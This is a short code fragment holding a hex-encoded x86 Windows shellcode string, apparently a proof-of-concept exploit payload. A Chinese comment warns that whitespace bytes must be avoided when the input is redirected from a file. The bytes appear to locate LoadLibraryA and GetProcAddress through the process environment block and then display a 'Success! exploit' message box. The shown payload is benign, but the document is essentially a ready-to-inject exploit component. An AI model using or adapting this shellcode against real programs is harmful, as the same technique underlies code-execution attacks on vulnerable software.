/*

如果从文件进行重定向输入：shellcode不能包含\x09 \x0a \xb \x0c \x0d \x20等字符

*/

$shellcode = 
"\x55\x8b\xec\x33\xc9\x51\x51\x68\x6f\x69\x74\x00\x68\x65\x78\x70".
"\x6c\x51\x68\x65\x73\x73\x21\x68\x53\x75\x63\x63\x68\x33\x32\x00".
"\x00\x68\x75\x73\x65\x72\x68\x6f\x78\x41\x00\x68\x61\x67\x65\x42".
"\x68\x4d\x65\x73\x73\x64\x8b\x41\x30\xbb\x2d\x00\x00\x00\x83\xeb".
"\x21\x8b\x04\x18\x8b\x70\x1c\x8b\x46\x08\xbf\x21\x00\x00\x00\x4f".
"\x8b\x3c\x3e\x8b\x36\x66\x39\x4f\x18\x75\xec\x8b\xf0\x8b\x46\x3c".
"\x8b\x4c\x06\x78\x03\xce\xbb\x21\x00\x00\x00\x4b\x8b\x1c\x19\x03".
"\xde\x33\xff\x4f\x60\x47\x8b\x14\xbb\x03\xd6\x8b\x02\x3d\x4c\x6f".
"\x61\x64\x75\xf1\x8b\x42\x04\x3d\x4c\x69\x62\x72\x75\xe7\x8b\x42".
"\x08\x3d\x61\x72\x79\x41\x75\xdd\x8b\x59\x24\x03\xde\x66\x8b\x3c".
"\x7b\x8b\x59\x1c\x03\xde\x03\x34\xbb\x8b\xc6\x89\x45\xfc\x61\x47".
"\x8b\x14\xbb\x03\xd6\x8b\x02\x3d\x47\x65\x74\x50\x75\xf1\x8b\x42".
"\x04\x3d\x72\x6f\x63\x41\x75\xe7\x8b\x42\x08\x3d\x64\x64\x72\x65".
"\x75\xdd\xb8\x2d\x00\x00\x00\x83\xe8\x21\x8b\x04\x02\x66\x3d\x73".
"\x73\x75\xcc\x8b\x59\x24\x03\xde\x66\x8b\x3c\x7b\x8b\x59\x1c\x03".
"\xde\x03\x34\xbb\x8b\xc6\x89\x45\xf8\x8d\x5d\xdc\x53\xff\x55\xfc".
"\x8d\x5d\xd0\x53\x50\xff\x55\xf8\x6a\x01\x8d\x5d\xf0\x53\x8d\x5d".
"\xe4\x53\x6a\x00\xff\xd0\x83\xc4\x30\x5d\xc3";